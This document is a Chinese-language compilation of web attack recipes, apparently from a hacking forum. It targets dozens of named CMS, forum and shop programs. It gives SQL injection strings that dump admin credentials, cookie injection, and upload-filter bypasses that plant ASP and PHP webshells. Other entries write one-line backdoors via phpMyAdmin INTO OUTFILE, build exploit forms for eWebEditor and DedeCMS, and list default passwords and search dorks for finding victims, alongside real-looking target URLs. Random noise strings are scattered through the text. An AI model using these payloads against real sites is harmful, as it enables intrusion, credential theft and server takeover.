启航企业建站系统 cookie注入漏洞通杀所有版本% ? U* u7 O5 ?. T. r1 N9 [
3 B/ C0 q9 H- J1 G4 c
直接上exploit:' c' K. y) d: x4 `- k! L/ p
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
+ J- m2 _ ^& t; U2 p- Btest:http://www.tb11.net/system/xitong/shownews.asp?id=210( `$ {5 z, b9 d7 T( k+ i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ G3 }3 c2 P8 n* M' H( b
Asprain论坛 注册用户 上传图片就可拿到webshell
4 W0 W1 d6 a) f% _) Y$ g S
% ?& o8 c* }+ oAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
4 d' t/ B, a+ Q L1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
% S3 L! e* k& C4 E8 _2.gif 为一小图片文件,一定要小,比如qq表情图片/ k: _4 g$ T* L# B$ x6 e
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用8 Z4 q1 v5 N6 r5 \. R5 h+ V3 R3 Y9 V
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
. [; z2 Z. T6 {0 e5.q.asp;.gif
+ \3 U1 }# ]: l# n" Qgoogle:Powered by Asprain
0 |! z/ K" X: M--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 ^' n9 |& W% K
3 ]# }! _) J( J, M' f; B& }2 Z& iShopNum1全部系统存在上传漏洞。1 f7 J4 s) u3 {! Y+ ]- e$ C
* y5 Q8 `- j% r0 u' i3 }- U
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。* Z' e+ ]$ q1 ?* F. @
按说明 提示登录后台。。2 v1 p2 {8 q7 e& r. t0 X
在后台功能页面->附件管理->附件列表
% j( v* X G$ X4 `8 n0 g可以直接上传.aspx 后缀木马3 \2 {4 h% h! s5 x: X
http://demo.shopnum1.com/upload/20110720083822500.aspx
' m; l$ I! b. t--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 D& Z' [3 T7 W% W4 a" U8 o# R
, n* l5 Y0 S; V0 {! X, O. ~牛牛CMS中小企业网站管理系统 上传漏洞
A8 N2 o4 b9 J$ s1 `" y' w! Y6 W9 V& S l
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。1 }- O2 _% F! g8 {- y8 G
后台:admin/login.asp
B. a" [8 [ Wewebeditor 5.5 Nday& i( r f% l$ \# U
exp: R2 P& B0 ]* R$ g; h/ f
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
h3 [ y% i8 r% m b2 }<input?type=file?name=uploadfile?size=100><br><br>?
0 _, T, A9 t/ |( @. i$ B! ~<input?type=submit?value=upload>?
, `0 c7 y# X1 f</form>
3 _2 E. b& N; l# O1 l( o1 Lps:先上传小马.
1 o" O$ I. T# V# winurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
5 k% H1 L% k- A8 I2 x7 U1 d e' l; H4 _$ m; v1 q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------% X5 f6 ~7 l+ g j
* m4 ^/ L b/ S9 ?; m0 J. t+ iYothCMS 遍历目录漏洞
+ j C1 B9 j- B" Q, |4 m. Q, K2 T. G9 f! b9 }
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
4 q) r" c/ B- ^默认后台:admin/login.asp# v! n% x- J. r
遍历目录:
: N( a5 \9 {/ K& D8 }7 P4 mewebeditor/manage/upload.asp?id=1&dir=../% @, N5 H0 Q: ~. o7 u
data:( \7 F) ~9 b: P* X- e$ U
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa! G& \ [' }4 K. n
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! K; K5 }9 |1 T- ]$ F
' k9 l+ Z$ a! b; y6 ~% d* o+ ?Net112企业建站系统 1.0
: Y( }& G8 `; D3 }" D+ L- A4 C8 b/ }. I# N8 k, s& r/ Q* {
源码简介:
" g+ s$ V. ]( @# w7 MNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
6 s$ V/ G4 ~. G: L添加管理员:+ A% g# N* q" k- r$ d
http://www.0855.tv/admin/admin.asp?action=add&level=2
. g1 X3 K* {9 h" J+ ]! r$ ^, E其实加不加都不是很重要,后台文件都没怎么作验证。
: h8 z+ u* s7 D! d1 }$ V8 T: c上传路径:+ @0 Q& n; A* @
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
& I! Z2 N. ^+ ahttp://www.0855.tv/inc/Upfile.asp?Stype=2" m3 m% b6 g! j% [$ l1 p
怎么利用自己研究。1 {. S8 _. n9 I: V
遍历目录:4 z; @8 |: h( V8 e: z8 m
http://www.0855.tv/admin/upfile.asp?path=../..
" H# L) B$ ]; {3 h5 Y* H如:
- s' S+ P# v' }& Nhttp://www.0855.tv/admin/upfile.asp?path=../admin2 h8 d2 a) Y5 U. J: K2 U" P
http://www.0855.tv/admin/upfile.asp?path=../data
' e4 u# `( G# C: T--------------------------------------------------------------------------------------------------------------------------------------------------------------------------% b0 K7 u) t% Y
+ ?2 Y! z7 }& F: O: O$ T易和阳光购物商城通杀 上传漏洞
4 i: m* N+ x( ]$ f1 t& n- r- u' \# H+ R8 F+ }# j- a; z$ E
前提要求是IIS6.0+asp坏境。
/ Q$ I1 a, T& w3 k7 k% Q) |8 l漏洞文件Iheeo_upfile.asp
# A+ w3 V2 \6 C& a过滤不严.直接可以iis6.0上传8 a- V5 {* b/ `! m, x8 K
把ASP木马改成0855.asp;1.gif
* P; P" g; x9 c3 G直接放到明小子上传
7 R: r T1 v$ Y/ w/ x( VGoogle搜索:inurl:product.asp?Iheeoid=2 l W# n! M% F' D) `+ c( Y9 q4 X
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 U4 F- F+ D" h; u. m# X" D
5 T/ i" \) r* {4 h) ]& P
phpmyadmin后台4种拿shell方法
& U$ j w' M; g3 V: e1 v7 L6 Y
- n( ]/ ?5 h3 e. J! I, }方法一:
# {8 d; P( e$ DCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );6 @1 |7 ]& N. j3 i& W
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
* `3 s* c! Z- N6 C" bSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';6 v! C1 c- h6 q% a2 y3 M+ j+ w
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
& w+ M- Z' t* m* O一句话连接密码:xiaoma
+ v! i; a/ u- h* m! e8 @方法二:8 W6 ]# P+ A9 U
Create TABLE xiaoma (xiaoma1 text NOT NULL);& D9 ]0 t: I1 j! |
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
8 h C/ v: j `select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
; }" Z8 N6 @2 V8 Y$ N9 d# x. S* _- rDrop TABLE IF EXISTS xiaoma;
* L. @, ^8 y5 t6 ^- H) M& j方法三:
6 R8 |/ Y4 |. u7 l6 F读取文件内容: select load_file('E:/xamp/www/s.php');" p* Y0 b6 U& C( h1 u8 g& {
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'7 a0 D. H. R! E- w% O
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
# T, {! R: M3 A4 m6 @! }方法四:3 ]3 ^3 i8 d" R9 r* H' O5 S
select load_file('E:/xamp/www/xiaoma.php');) d7 s- h/ Q+ u4 f$ S9 P
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
' [- M) ]) F, M然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
0 |' u, r7 {; f: n4 w$ L--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ a8 E7 [* N$ W( I0 n
. f6 A. q; t8 ]" I
传信网络独立开发网站源码0day漏洞
0 h4 @- C" J" d! r
! X2 K. |- e7 f, v后台system/login.asp) x& P$ R9 U% u
进了后台有个ewebeditor
% ~# K B; Q8 W. ^ I: A3 c! b4 ^Google 搜索inurl:product1.asp?tyc=" H2 `* v# }. `
编辑器漏洞默认后台ubbcode/admin_login.asp" _) M- k) l" _' g$ X' K
数据库ubbcode/db/ewebeditor.mdb C% G9 v* p1 |! \( _% k( q1 x
默认账号密码yzm 111111
/ `0 K5 p+ o9 d% B1 |8 u
3 s* D9 d- ]& r& t& B9 a拿webshell方法# I8 y" ^4 V& m% w0 V
登陆后台点击“样式管理”-选择新增样式
& d5 ~1 H/ _: C3 V1 w. W/ v样式名称:scriptkiddies 随便写
6 H' Z+ d3 n* z- {路径模式:选择绝对路径 " B- b; u& S+ O! o% G* m
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx' }8 }8 Q5 g# r" L! X( o y4 t+ i, L
图片类型比如就是我们要上传的ASP木马格式
% T' B6 j0 l5 Y2 d& [上传路径:/1 E/ A8 _0 q4 T* Q7 [
图片限制:写上1000 免的上不了我们的asp木马
3 \' I' r3 K) M3 C5 X$ f上传内容不要写
5 H9 T, e$ u& r可以提交了
3 ^7 ~+ O4 R _( P: }样式增加成功! ' H7 y* @" i8 t+ q& J: Z6 y3 ?9 X
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 9 g5 O9 n& d. B+ x; X: @+ o3 S, d
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
4 E, y6 x- n v网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies2 z2 Y/ r; U6 q5 q) [7 G
上ASP木马 回车 等到路径
6 f7 _; U3 m* R7 n/ ^" }8 L i# |* v6 d4 S5 ]
后台:system/login.asp
* x% J H; Y; C$ ]7 hExp:# \' H% `& |9 `# X. p
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
: d8 h5 t7 n. C `测试:: B& N: q/ Q3 { M
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master# D/ H7 m- H, c# U
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
/ t/ O4 ~$ B, W* W6 |% h% Z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; P; D* {' _. T/ Y. V9 ?% {
! x9 \! M$ s( J6 A
foosun 0day 最新注入漏洞
, T! e' ]1 s) a4 O2 @: c9 e8 B' m3 I, _& v( a$ |# H Y- v+ {
漏洞文件:www.xxx.com/user/SetNextOptions.asp
2 k# [: L& w* w8 v+ i利用简单的方法:3 ]: L5 N- ^* _* y# e# E* V$ C
暴管理员帐号:0 e( n8 v+ _1 }; a! K& d. [$ D
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin; h: I& ]5 {* p2 q q' ]* S
暴管理员密码:
. f: C2 Z- p" Rhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
' A) a8 H/ c0 e) l--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( I6 ^: G. g, V: @% J
- f5 O: p4 P. @3 C$ f$ [4 C9 S网站程序的版权未知!
* w, G4 N, C! Q, i. q+ L0 [
" x6 x8 L- R6 p6 E$ l默认网站数据库:
! y# r5 g; m& ?; |* [* B; mwww.i0day.com/data/nxnews.mdb
* G/ u! w2 ^8 U1 }) eewebeditor 在线编辑器:: p6 N2 I( p A% G/ O& ]
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb& E# T( K7 r. G$ M
登录地址:ewebeditor/admin_login.asp
0 g5 D3 Y% _& v5 ?默认密码:admin admin
' U4 Z" V% h& a1 X2 m0 \; r登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data- S- e8 P5 i4 J1 N$ C
. m; A) N/ @5 |4 QSql注入漏洞:8 O3 a1 g; q9 Q5 H
http://www.i0day.com/detail.asp?id=12
) e5 d. K: r5 C1 h% Z* [exp:
0 ]& w! X! |" Yunion select 1,admin,password,4,5,6,7,8 from admin
$ _7 T0 P" G p5 ^爆出明文帐号/密码: Z# ?! ] B% B$ l- S% o
0 h: m8 Y4 M, p. y+ x+ u上传漏洞:3 v' Y' h1 B6 [6 o7 g6 ]
后台+upfile.asp3 W9 r; J" q0 T, r6 C6 L1 Q7 v
如:( n4 y3 o& L! i* U( ^( A
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。' P2 A0 m2 ]5 h% V' V+ A" @4 I
shell的地址:网址+后台+成功上传的马- Q+ p8 t- z' ^5 a5 Q' k
google:inurl:news.asp?lanmuName=: R, H% z. p; A! F1 \0 S) N
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 y! Q7 u- N. g& j. }1 ^& L8 ?, j5 _
dedecms最新0day利用不进后台直接拿WEBSHELL
4 G5 T" o& i- E W
0 C' A0 ?: {/ t! j, U' t- i拿webshell的方法如下:9 d% a% i* d8 T) b+ M/ H( }
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
$ Y4 e4 g8 G6 \0 T* t; e前题条件,必须准备好自己的dede数据库,然后插入数据:4 @6 k7 t" O$ h" C% U' U* q- V
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
& Q$ u2 L) d, b1 L" j0 a% f
L) m6 h# \" r* x再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
7 h( u4 @+ z- m- u<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
1 ^9 o6 ^ @3 ^6 G; t5 \<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
3 H% c. M! Z+ i) H8 X# d9 N<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />1 Y3 C% ^" {% J0 k, A
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
2 Z! @, Q0 q2 r* R& m<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />3 y, C3 Z7 X0 a, m) J$ O* G: K8 l
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
1 G- B1 y3 L E' v. ?; V<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />0 s! _: U! f+ n8 x3 _
<input type="text" value="true" name="nocache" style="width:400">/ f! ~) s2 D: I' l0 U4 S! l
<input type="submit" value="提交" name="QuickSearchBtn"><br />
7 r8 |5 q0 Q% T/ X. `; A</form>
& J7 U$ f' B% e( s \* n" A<script>
( k/ I( S8 R9 E4 Gfunction addaction()7 `" g! o% _$ T2 ? q4 \8 n
{7 x- J9 t* ?' k4 B
document.QuickSearch.action=document.QuickSearch.doaction.value;) ^; @; q$ Z5 a- V) C4 }6 }
}! F) V4 E2 ^/ F. B5 A( p
</script>, [5 G5 r2 v; m+ ?$ y& _1 r
-----------------------------------------------------------------------------------------------------------------------------------------------
7 a9 n( p' J6 y) B! k" c1 u
5 h% O0 l% B0 x8 Zdedecms织梦暴最新严重0day漏洞, A& J1 F; d# `8 {1 `/ W7 {6 q, r
bug被利用步骤如下:
5 }3 C0 [3 O8 B( L1 Mhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root% R' ^8 h6 w& R" f1 j+ h, a, f. p! ]
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
% J# W% q7 j8 J) _; C-------------------------------------------------------------------------------------------------------------------------------------------) V* o9 o& s9 s
3 c: z4 y6 m" Y# g) Y
多多淘宝客程序上传漏洞 " v. V7 ^$ r X# l3 M+ h
漏洞页面:" P- o+ y% x( J8 R* J) c
admin\upload_pic.php& g& j; j' w; r+ b/ p7 w2 q
传送门:
0 e* Z8 O* C9 h: ^ v& xhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1$ W' a U& B9 G8 J! m1 W1 x4 f
PS:copy张图片马 直接 xxx.php 上传抓包地址!
5 \1 j+ }4 W& F6 x, L$ a7 i------------------------------------------------------------------------------------------------------------------------------------------------------' f) K1 `) ]+ S6 T
' C4 b/ b4 f! i% |" \1 P5 g1 o; U无忧公司系统ASP专业版后台上传漏洞
3 f7 Y5 E4 |$ Q- X8 A漏洞文件 后台上传( A/ L: }: I- t0 z/ s
admin/uploadPic.asp
, C$ }, b4 r& h9 d9 M* y漏洞利用 这个漏洞好像是雷池的
; f2 Z; q+ {' Y6 L e) m$ |! @4 q" vhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=19 a5 X5 D$ D, G, F! N
等到的webshell路径:
0 e: m9 ^. C; b. U9 s/UploadFiles/scriptkiddies.asp;_2.gif1 c9 u) U$ E! E: x7 w
---------------------------------------------------------------------------------------------------------------------------------------------------, N: o. E% b( f; n
; W, g1 M! K$ ]住哪酒店分销联盟系统2010, v. p( }% N# P, [, N% {- p4 P
Search:
: {! D8 z# N) `5 L' b f! finurl:index.php?m=hotelinfo6 B% z) h" L7 }: t6 R
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
9 R' } @5 b9 _5 ~默认后台:index.php?m=admin/login6 \" [1 r6 t' j' m
--------------------------------------------------------------------------------------------------------------------------------------------------
$ T. n% j4 W& v T. q% F7 S, A! X
9 o- u4 [( v' p, K, Q3 u, Xinurl:info_Print.asp?ArticleID=$ [$ H& L3 j: ?' O6 Z) I
后台 ad_login.asp4 n8 _; K+ a6 g
爆管理员密码:# T. ]" O8 S1 i+ M
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin$ B" M" Z0 z, ?8 Z
------------------------------------------------------------------------------------------------------------------------------------------------------------
9 _0 g4 G, @& r7 F F* p6 v. F( l$ ^" |; ^
搜索框漏洞!9 [- N, Y O3 I# H! m) \, X
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='8 _) d, O+ h& R* B. t# k
--------------------------------------------------------------------------------------------------------------------------------------------------------4 }% o3 r, a! Z% a% C! B4 C- l% u
9 V% n" p7 I. i$ t
关键字:
: S; O3 b# e/ `) t, h2 Z) Qinurl:/reg_TemletSel.asp?step=2
5 s N0 \: d, N, w- B/ x: r P. O或者3 J& o9 F$ J! `/ T- m
电子商务自助建站--您理想的助手6 \4 J7 A; u3 i2 E2 ~
-------------------------------------------------------------------------------------------------------------------------------------------------# s5 T- q% {1 P6 g4 {
4 ]+ v) C- M3 x9 B8 K0 E+ M4 |, n' CiGiveTest 2.1.0注入漏洞
* w2 u& m6 v, q8 g3 i( Z6 n* P5 _Version: <= 2.1.00 h0 `4 r2 m7 Z3 n- z
# Homepage: http://iGiveTest.com/
7 [; J7 I9 O* E9 x, Q3 i谷歌关键字: “Powered by iGiveTest”
7 k& K# y) p5 r随便注册一个帐号。然后暴管理员帐号和密码0 r2 C& H# B* L% F1 F
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1+ k P9 d, D5 R' i7 o4 h7 S0 Z
------------------------------------------------------------------------------------------------------------------------------------------------( o3 G( D# Q) u: l) X) x
; Q; v& Y' q0 Y9 ?0 y" `1 ]6 i1 PCKXP网上书店注入漏洞
4 M3 S3 Z: C+ Z8 M工具加表:shop_admin 加字段:admin
# J/ a) z0 Q9 [3 q5 b后台:admin/login.asp ( t0 t9 H; l4 v# M5 O& [
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=// Y J; o( a' h8 m2 u1 H5 {9 Q
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
7 e8 _ L4 Y; Z4 i7 o1 B& [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 ^& P$ k4 l. D4 y* Z. q& [7 O- U* h5 V
段富超个人网站系统留言本写马漏洞7 c j6 h* E3 Q/ D: z# Y
源码下载:http://www.mycodes.net/24/2149.htm- Y9 P+ Y& J6 `( t% z0 P) `3 M& q r
addgbook.asp 提交一句话。
2 ]3 X' z, l# c连接: http://www.xxxx.tv/date/date3f.asp
0 t X4 |- J! y) i2 g9 }; z2 Jgoogle:为防批量,特略!
0 t, E% S: ^, D2 a; ^" Z _# T-------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 S* y5 @/ f" i
& l0 |1 J( H' r% y9 @) n! J智有道专业旅游系统v1.0 注入及列目录漏洞7 |' Y' m, C% M# p2 ~& g- b" l+ s
默认后台路径:/admin/login.asp$ A3 N2 Y) ]; u' D6 j8 o
默认管理员:admin& A6 ?. f8 P4 u) y8 b
默认密码:123456) ?" K( r+ P6 H
SQL EXP Tset:% k! V% `$ t, b1 v# k
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin" {9 u# M: i2 G9 E
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 y8 H, q4 c ?
6 k S" t& P1 R8 V- b3 V0 y$ Newebeditor(PHP) Ver 3.8 本任意文件上传0day: ?; G7 w& b4 q' }/ M" ?% p) ~
EXP:4 l4 U G1 o* O7 M. p, U
<title>eWebeditoR3.8 for php任意文件上EXP</title>8 p& [2 G2 H4 R+ ?' I# O& T+ n
<form action="" method=post enctype="multip
) ^: h# R7 W4 p3 w( _5 Tart/form-data">
^+ p$ l/ ]8 S$ C& I/ u5 t5 G7 g0 p$ t: J<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
. c! z( s& A& QURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
8 j) ?6 b! [- L0 V- U<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 6 s0 p5 u( U0 E- R- W" D1 G
file:<input type=file name="uploadfile"><br> 7 S3 J% g6 H: `# D
<input type=button value=submit onclick=fsubmit()> 0 U" g2 |/ K* x* B; Q/ [( Y
</form><br> ) J: e5 H- w- Z4 } l: c$ B$ l% f
<script> 2 {- A/ ~# [2 N: J% s7 e; ?
function fsubmit(){ # L3 `% o0 f$ d
form = document.forms[0];
7 x( N. A4 v. \5 m! vform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; : V- U% H6 c" q8 i9 w
alert(form.action); 8 Q. W/ ], j. w5 [, L" _
form.submit();
S `2 l7 K t z: `" a) p} 9 Q$ s' Z( h' C, a; l$ {9 h* r
</script>
3 ]- n. g0 J6 t* G1 W9 G1 x注意修改里面ewebeditor的名称还有路径。% p7 U# w1 S( V# w& X4 _
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------, x* P7 f Z, X( F% e, x$ z4 Q
, ?" X8 t! a0 {, h/ s2 W提交’时提示ip被记录 防注入系统的利用
: |. ^) \- E V7 j网址:http://www.xxx.com/newslist.asp?id=122′
9 x2 t: G3 `) ]& j o提示“你的操作已被记录!”等信息。
0 U& o/ ]1 S- W: w利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
8 L. f) O1 a% f1 U. a. N, U; u-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------* `& }# v/ M0 t5 O$ ~
. }& \+ K, d' s- W5 b1 J8 Y西部商务网站管理系统 批量拿shell-0day+ m9 y b9 s5 K5 `2 {1 ~( d
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
4 k" z6 T9 L: r3 p1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛8 A4 R1 b" k) p( m( T3 Z& T
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合' F! ^% P4 L# C: A- Y- z' x/ `
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂- v2 d% U3 a( E4 J
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 a$ O4 V' G# e& z" \, z& f) Q
: N# i, f2 n. ] z. W2 E' m7 B+ C
JspRun!6.0 论坛管理后台注入漏洞) P, Y+ q, O# |% k7 x
# z- N/ n; [$ OSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
1 h! j+ z* O& Y$ \" yJspRun!6.0 8 _5 o5 B* d, q
漏洞描述:3 u8 ]) \# p+ y8 Y& ^- W) d9 p3 ^3 I
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
9 v0 w% p$ }/ S, L% `- }在处理后台提交的文件中ForumManageAction.java第1940行
1 b/ W/ m+ d# FString export = request.getParameter("export");//直接获取,没有安全过滤1 `. n3 ^. `( d
if(export!=null){
, R: n$ J# @: [6 kList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...) n6 k" ?; e9 u; k; w+ G
if(styles==null||styles.size()==0){
% m) l( L" z2 o% N- }. q<*参考
8 e4 D8 R+ v- F: e3 Q! S5 T h- Snuanfan@gmail.com! _3 @7 b3 d8 a o" O7 W# Z. M5 @) Q
*> SEBUG安全建议:8 m: s6 ^2 X4 t0 |: v
www.jsprun.net; |& _- M, Z, R0 p/ M) a
(1)安全过滤变量export: b- V& p4 G7 L: C4 @, r
(2)在查询语句中使用占位符
, g ?- x" @% O) C0 P- d6 J- p! f2 H------------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 d( l5 ~' R, M3 Z$ m
# _# ]' {* }! T1 B乌邦图企业网站系统 cookies 注入' x! w# g( c8 V$ G% k
+ G4 Q% v+ S( s( [
程序完整登陆后台:/admin/login.asp+ J6 k& k7 E: j- Q
默认登陆帐号:admin 密码:admin888
. r3 Q, B/ _2 z$ F' [6 N) ^! D2 y4 t语句:(前面加个空格)$ V4 Z) o( s; k8 s; T/ a
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin1 Q5 T% R) X5 V- U W9 Q. _
或者是16个字段:4 }4 R/ X' B e" z( g
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
( v7 {- r! o h爆不出来自己猜字段。
9 D- s! D8 O; n3 I2 Q- g注入点:http://www.untnt.com/shownews.asp?=88
, l$ G! O+ t* w$ ^" mgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp# k/ Q; n# ~- `
关键字:, v+ E4 P; F9 B/ z" s
inurl:shownews?asp.id=/ b, c1 ]; v9 l8 W
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- H! I% \) b) s: N6 ?! W" f
0 h- A# z; H3 h% `8 i# y. [CKXP网上书店注入漏洞
1 y4 F0 p/ w, {5 [
/ m. r. u$ B3 k" _4 m6 k! {3 b工具加表:shop_admin 加字段:admin! W' ^$ t- l% |" ^1 a* P9 v2 ~. W
后台:admin/login.asp
2 H- I- a+ }8 f; U( n' }; ~4 k8 n. V登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/2 T4 f2 I' Q& L* k6 Y- @! _: V
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
' h: U! Q$ M4 t5 ]; a---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, ]/ F/ w3 e0 ?; p* R2 q4 o% x% r7 b4 S7 j) g
YxShop易想购物商城4.7.1版本任意文件上传漏洞! T6 t8 X- o$ a" y3 o
# ?3 f& U" h* u1 [$ i- M0 M4 d
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
; u6 b. ?. q8 i; `跳转到网站根目录上传任意文件。
* D2 M7 f. I4 i( k' L如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件: `: U0 n/ ]7 b' S' {
